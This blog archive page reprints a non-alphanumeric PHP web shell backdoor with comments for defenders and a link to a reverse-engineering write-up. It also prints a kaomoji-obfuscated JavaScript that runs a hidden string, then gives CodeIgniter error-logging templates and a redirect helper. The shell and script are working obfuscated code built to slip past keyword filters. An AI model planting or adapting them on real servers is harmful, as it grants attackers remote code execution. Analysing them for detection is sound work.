月度归档:2013年12月

PHP shell 非字母数字后门

刚看了篇老外逆向分析这个 PHP shell 非字母数字后门的文章,感觉很精彩。就是下面这个 PHP shell,各位看官肯定很熟悉;依稀记得 90 那时也有位大牛分析过来着,忘了,现在才知道这后门是 Mr. Gareth 这老黑弄出来的。原文:http://blog.omfgitsasalmon.com/blog/post/1/non-alphanumeric-php-shell

<?
// Sample under analysis: a PHP backdoor written without any letters or digits.
// Every variable name is made of underscores, and the strings the code needs
// are assembled at runtime from implicit type conversions, increments, shifts
// and XOR, so signatures that look for keywords or function names have nothing
// to match against.
// Defender notes: the recognisable features are structural - an almost-zero
// ratio of alphanumeric characters, pervasive `@` error suppression, a
// variable-variable (the `$` that ends one line and is completed on the next)
// and a final dynamic call of the form `$x[...]($x[...])`.
// NOTE(review): per the analysis linked above, that final call uses
// request-supplied data as the callable and its argument - confirm against the
// write-up. A file with this shape on a server is a compromise indicator.
@$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$
$_[$__+$__];$_[@-_]($_[@!+_]);
?>


没想丢上 icq 一土耳其黑阔给出个 JavaScript 给雷到了 ^ ^|| 


// Emoticon-style obfuscated JavaScript: identifiers are kaomoji, and the letters
// the script needs are obtained by indexing into stringified values (for
// example `(x==3)+'_'` or `obj+'_'`).
// NOTE(review): the closing `(...)['_']( (...)['_'](...)(...) )('_')` shape looks
// like a string being compiled and then invoked through a constructor lookup,
// i.e. dynamic code execution - confirm by decoding the string statically or
// in an isolated sandbox. Content filters that only inspect readable keywords
// will not see the payload.
゚ω゚ノ= /`m′)ノ ~┻━┻ //*′∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚ー゚)+ (゚Д゚)[゚ε゚]+(゚ー゚)+ (c^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (c^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (o^_^o)+ (゚Θ゚)+ (゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');


codeigniter 错误收集处理

codeigniter 错误收集处理

error_php.php 

添加如下代码:

<?php
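// Append one record describing the current PHP error to logs/error_php.html.
// $severity, $message, $filepath and $line are not assigned in this file;
// presumably they come from the CodeIgniter error-template scope - confirm.
//
// The log is an HTML file, so every request- or error-derived value is
// HTML-escaped before it is written: SERVER_NAME and REQUEST_URI can be
// influenced by the client, and an unescaped value would run as script in the
// browser of whoever opens the log. Markup already present in $message is
// therefore shown literally.
//
// NOTE(review): the whole POST body is logged, which can include passwords or
// tokens, and the file sits under the current working directory. If that
// directory is web-served the log is readable by anyone - keep it outside the
// document root or deny access to it, and consider masking sensitive fields.
$esc = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

$time = date('Y-m-d H:i:s', time());
$url = 'http://' . $_SERVER['SERVER_NAME'] . ':' . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];

// Inserted as returned by dump2filea() because that string carries its own
// <br> markup; the POST keys and values inside it have to be escaped where the
// dump is built.
$postdata = dump2filea($_POST);

$strs = 'timp:<p>' . $time . '</p>url=><p>' . $esc($url)
    . '</p><p>severity=>' . $esc($severity)
    . '</p><p>message=>' . $esc($message)
    . '</p><p>filepath=>' . $esc($filepath)
    . '</p><p>line=>' . $esc($line)
    . '</p><p>postdata=><br>' . $postdata
    . "</p><p>-----------------------------------------------</p>\r\n";
file_put_contents(realpath('./') . "/logs/error_php.html", $strs, FILE_APPEND);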




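/**
 * Flatten a value into "key=value&" text for the HTML error log.
 *
 * Array keys and leaf values are HTML-escaped, because the visible caller
 * passes $_POST and writes the result into an .html log; without escaping a
 * submitted field could inject markup or script into that log. The "<br>"
 * after a nested key is the only markup this function emits itself.
 *
 * NOTE(review): the same function is declared in several error templates; if
 * two of them (or one of them twice) are included in a single request, PHP
 * stops with a redeclaration error. Moving it to one shared helper file would
 * avoid that.
 *
 * @param mixed  $data     Value to dump. A non-array value is passed through
 *                         unchanged (not escaped).
 * @param string $path     Label used to track nesting depth; also the file
 *                         that is written when $is_write is truthy.
 * @param int    $is_write When truthy, write the text to $path instead of
 *                         returning it.
 * @return mixed FALSE when $path is empty, the dump text when $is_write is
 *               falsy, nothing when the text was written to a file.
 */
function dump2filea($data, $path='a', $is_write = 0) {
    // Indentation depth remembered per path label across recursive calls.
    static $UDID = array();
    if (empty($path))
        return FALSE;
    if (!isset($UDID[$path])) {
        $UDID[$path] = 0;
    }
    $indent = str_repeat('  ', $UDID[$path]);
    $text = '';
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            $key = htmlspecialchars((string) $k, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            if (is_array($v)) {
                // Children are indented one level deeper than their parent.
                $child = $path . ' + ' . $k;
                if (!isset($UDID[$child])) {
                    $UDID[$child] = $UDID[$path] + 1;
                }
                $text .= $indent . $key . "=<br>" . dump2filea($v, $child, 0);
            } else {
                // Same values the original test selected (null, false, ''),
                // written without calling strlen() on a non-string.
                if ($v === null || $v === false || $v === '') {
                    $v = 'NULL(AUTOFILL)';
                }
                $text .= $indent . $key . '='
                    . htmlspecialchars((string) $v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "&";
            }
        }
    } else {
        $text = $data;
    }
    if ($is_write) {
        file_put_contents($path, $text);
    } else {
        return $text;
    }
}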


?>

error_db.php

添加如下代码

<?php
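// Append one record describing the current database error to logs/error_db.html.
// $heading and $message are not assigned in this file; presumably they come
// from the CodeIgniter error-template scope - confirm.
//
// The log is an HTML file, so every request- or error-derived value is
// HTML-escaped before it is written: SERVER_NAME and REQUEST_URI can be
// influenced by the client, and a database error message can echo parts of
// the failing query. Markup already present in $message is therefore shown
// literally.
//
// NOTE(review): the whole POST body is logged, which can include passwords or
// tokens, and the file sits under the current working directory. If that
// directory is web-served the log is readable by anyone - keep it outside the
// document root or deny access to it, and consider masking sensitive fields.
$esc = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

$time = date('Y-m-d H:i:s', time());
$url = 'http://' . $_SERVER['SERVER_NAME'] . ':' . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];

// Inserted as returned by dump2filea() because that string carries its own
// <br> markup; the POST keys and values inside it have to be escaped where the
// dump is built.
$postdata = dump2filea($_POST);

$strs = 'timp:<p>' . $time . '</p>url=><p>' . $esc($url)
    . '</p><p>heading=>' . $esc($heading)
    . '</p><p>message=>' . $esc($message)
    . '</p><p>postdata=><br>' . $postdata
    . "</p><p>-----------------------------------------------</p>\r\n";
file_put_contents(realpath('./') . "/logs/error_db.html", $strs, FILE_APPEND);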




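/**
 * Flatten a value into "key=value&" text for the HTML error log.
 *
 * Array keys and leaf values are HTML-escaped, because the visible caller
 * passes $_POST and writes the result into an .html log; without escaping a
 * submitted field could inject markup or script into that log. The "<br>"
 * after a nested key is the only markup this function emits itself.
 *
 * NOTE(review): the same function is declared in several error templates; if
 * two of them (or one of them twice) are included in a single request, PHP
 * stops with a redeclaration error. Moving it to one shared helper file would
 * avoid that.
 *
 * @param mixed  $data     Value to dump. A non-array value is passed through
 *                         unchanged (not escaped).
 * @param string $path     Label used to track nesting depth; also the file
 *                         that is written when $is_write is truthy.
 * @param int    $is_write When truthy, write the text to $path instead of
 *                         returning it.
 * @return mixed FALSE when $path is empty, the dump text when $is_write is
 *               falsy, nothing when the text was written to a file.
 */
function dump2filea($data, $path='a', $is_write = 0) {
    // Indentation depth remembered per path label across recursive calls.
    static $UDID = array();
    if (empty($path))
        return FALSE;
    if (!isset($UDID[$path])) {
        $UDID[$path] = 0;
    }
    $indent = str_repeat('  ', $UDID[$path]);
    $text = '';
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            $key = htmlspecialchars((string) $k, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            if (is_array($v)) {
                // Children are indented one level deeper than their parent.
                $child = $path . ' + ' . $k;
                if (!isset($UDID[$child])) {
                    $UDID[$child] = $UDID[$path] + 1;
                }
                $text .= $indent . $key . "=<br>" . dump2filea($v, $child, 0);
            } else {
                // Same values the original test selected (null, false, ''),
                // written without calling strlen() on a non-string.
                if ($v === null || $v === false || $v === '') {
                    $v = 'NULL(AUTOFILL)';
                }
                $text .= $indent . $key . '='
                    . htmlspecialchars((string) $v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "&";
            }
        }
    } else {
        $text = $data;
    }
    if ($is_write) {
        file_put_contents($path, $text);
    } else {
        return $text;
    }
}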


?>

error_general.php

添加如下代码

<?php
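// Append one record describing the current general error to logs/error_ge.html.
// $heading and $message are not assigned in this file; presumably they come
// from the CodeIgniter error-template scope - confirm.
//
// The log is an HTML file, so every request- or error-derived value is
// HTML-escaped before it is written: SERVER_NAME and REQUEST_URI can be
// influenced by the client, and an unescaped value would run as script in the
// browser of whoever opens the log. Markup already present in $message is
// therefore shown literally.
//
// NOTE(review): the whole POST body is logged, which can include passwords or
// tokens, and the file sits under the current working directory. If that
// directory is web-served the log is readable by anyone - keep it outside the
// document root or deny access to it, and consider masking sensitive fields.
$esc = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

$time = date('Y-m-d H:i:s', time());
$url = 'http://' . $_SERVER['SERVER_NAME'] . ':' . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];

// Inserted as returned by dump2filea() because that string carries its own
// <br> markup; the POST keys and values inside it have to be escaped where the
// dump is built.
$postdata = dump2filea($_POST);

$strs = 'timp:<p>' . $time . '</p>url=><p>' . $esc($url)
    . '</p><p>heading=>' . $esc($heading)
    . '</p><p>message=>' . $esc($message)
    . '</p><p>postdata=><br>' . $postdata
    . "</p><p>-----------------------------------------------</p>\r\n";
file_put_contents(realpath('./') . "/logs/error_ge.html", $strs, FILE_APPEND);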




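/**
 * Flatten a value into "key=value&" text for the HTML error log.
 *
 * Array keys and leaf values are HTML-escaped, because the visible caller
 * passes $_POST and writes the result into an .html log; without escaping a
 * submitted field could inject markup or script into that log. The "<br>"
 * after a nested key is the only markup this function emits itself.
 *
 * NOTE(review): the same function is declared in several error templates; if
 * two of them (or one of them twice) are included in a single request, PHP
 * stops with a redeclaration error. Moving it to one shared helper file would
 * avoid that.
 *
 * @param mixed  $data     Value to dump. A non-array value is passed through
 *                         unchanged (not escaped).
 * @param string $path     Label used to track nesting depth; also the file
 *                         that is written when $is_write is truthy.
 * @param int    $is_write When truthy, write the text to $path instead of
 *                         returning it.
 * @return mixed FALSE when $path is empty, the dump text when $is_write is
 *               falsy, nothing when the text was written to a file.
 */
function dump2filea($data, $path='a', $is_write = 0) {
    // Indentation depth remembered per path label across recursive calls.
    static $UDID = array();
    if (empty($path))
        return FALSE;
    if (!isset($UDID[$path])) {
        $UDID[$path] = 0;
    }
    $indent = str_repeat('  ', $UDID[$path]);
    $text = '';
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            $key = htmlspecialchars((string) $k, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            if (is_array($v)) {
                // Children are indented one level deeper than their parent.
                $child = $path . ' + ' . $k;
                if (!isset($UDID[$child])) {
                    $UDID[$child] = $UDID[$path] + 1;
                }
                $text .= $indent . $key . "=<br>" . dump2filea($v, $child, 0);
            } else {
                // Same values the original test selected (null, false, ''),
                // written without calling strlen() on a non-string.
                if ($v === null || $v === false || $v === '') {
                    $v = 'NULL(AUTOFILL)';
                }
                $text .= $indent . $key . '='
                    . htmlspecialchars((string) $v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "&";
            }
        }
    } else {
        $text = $data;
    }
    if ($is_write) {
        file_put_contents($path, $text);
    } else {
        return $text;
    }
}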


?>

error_404.php

添加如下代码

<?php
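// Append one record for the current "not found" request to logs/error.html.
// $heading and $message are not assigned in this file; presumably they come
// from the CodeIgniter error-template scope - confirm.
//
// Any client can trigger this template with a URL of its choosing, and the log
// is an HTML file, so each value is HTML-escaped before it is written;
// otherwise markup placed in the request URI would run in the browser of
// whoever opens the log. Markup already present in $message is therefore shown
// literally.
//
// NOTE(review): the file sits under the current working directory; if that
// directory is web-served the log is readable by anyone - keep it outside the
// document root or deny access to it. Because every unknown URL adds a record,
// the file also grows without bound unless it is rotated.
$esc = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

$url = 'http://' . $_SERVER['SERVER_NAME'] . ':' . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
$strs = '<p>url=></p><p>' . $esc($url)
    . '</p><p>Heading=></p><p>' . $esc($heading)
    . '</p><p>message=>' . $esc($message)
    . "</p><p>------------------------------------------------</p>\r\n";
file_put_contents(realpath('./') . "/logs/error.html", $strs, FILE_APPEND);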




?>

php showmsg函数

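/**
 * Emit a small script that optionally shows an alert, then either goes back
 * one history entry or navigates to $URL, and end the request.
 *
 * Both values are written as JavaScript string literals produced by
 * json_encode() with the JSON_HEX_* flags, so quotes, "<", ">" and "&" inside
 * them cannot terminate the string or the surrounding script element. The
 * original interpolated them raw, which let a crafted message or URL inject
 * script, and required callers to pass $URL already wrapped in quotes.
 *
 * NOTE(review): the target itself is not validated. If $URL can come from the
 * request, callers should restrict it to expected same-site paths, since an
 * arbitrary value allows redirects to other sites or a script-scheme URL.
 *
 * @param string $Msg Text for alert(); shown only when longer than one byte.
 * @param string $URL Navigation target. Empty means "go back". A value already
 *                    wrapped in one pair of matching quotes (the call style
 *                    the original required) is accepted and unwrapped.
 * @return void Does not return; exit() is called.
 */
function showmsg($Msg, $URL = "")
{
    $jsFlags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

    header("Content-type: text/html; charset=utf-8");
    echo "<script type=\"text/javascript\">";

    if (strlen($Msg) > 1) {
        $msgLiteral = json_encode((string) $Msg, $jsFlags);
        if ($msgLiteral === false) {
            // Input was not valid UTF-8: show an empty alert, never raw bytes.
            $msgLiteral = '""';
        }
        echo "alert(" . $msgLiteral . ");";
    }

    if ($URL == "") {
        echo "history.go(-1);";
    } else {
        $target = (string) $URL;
        $length = strlen($target);
        // Unwrap one pair of matching quotes supplied by legacy callers.
        if ($length >= 2
            && ($target[0] === '"' || $target[0] === "'")
            && $target[$length - 1] === $target[0]
        ) {
            $target = (string) substr($target, 1, -1);
        }
        $urlLiteral = json_encode($target, $jsFlags);
        if ($urlLiteral === false) {
            // Target could not be encoded safely; fall back to going back.
            echo "history.go(-1);";
        } else {
            echo "document.location.href=" . $urlLiteral . ";";
        }
    }

    echo "</script>";

    exit();
}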
